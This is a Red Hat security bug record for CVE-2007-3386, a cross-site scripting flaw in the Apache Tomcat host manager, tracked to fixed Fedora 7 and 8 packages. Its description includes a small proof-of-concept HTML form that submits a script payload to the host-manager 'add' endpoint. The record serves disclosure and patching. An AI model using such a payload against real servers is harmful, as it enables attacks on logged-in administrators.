Bug 247994 (CVE-2007-3386)

Summary: CVE-2007-3386 tomcat host manager xss
Product: [Other] Security Response Reporter: Mark J. Cox <mjc>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: kreilly
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: 5.5.25-1jpp.1.fc7 Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2007-11-17 05:34:57 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 254150, 254151, 254152, 254153, 254154, 254155, 254156, 254157    
Bug Blocks:    
Attachments:
Description Flags
proposed patch none

Description Mark J. Cox 2007-07-12 15:50:20 UTC
JPCERT#98038604

  Cross-site Scripting in Apache Tomcat host manager

  Assume that after logged in, the victim was lead to the malicious web
  server with following file installed.
  <form action="http://localhost:8080/host-manager/html/add" method="get">
  <INPUT TYPE="hidden" NAME='name' VALUE="aaa">
  <INPUT TYPE="hidden" NAME='aliases' VALUE="<script>alert()</script>">
  <input type="submit">
  </form>

  When the victim accesses to it, then the window pops up.  Therefore
  it is verified that vulnerability exists.

not public

Comment 1 Mark J. Cox 2007-07-12 15:50:20 UTC
Created attachment 159067 [details]
proposed patch

Comment 2 Mark J. Cox 2007-08-16 09:08:53 UTC
now public, opening bug

Comment 9 Fedora Update System 2007-11-17 05:34:46 UTC
tomcat5-5.5.25-1jpp.1.fc7 has been pushed to the Fedora 7 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 10 Fedora Update System 2007-11-17 05:37:36 UTC
tomcat5-5.5.25-1jpp.1.fc8 has been pushed to the Fedora 8 stable repository.  If problems still persist, please make note of it in this bug report.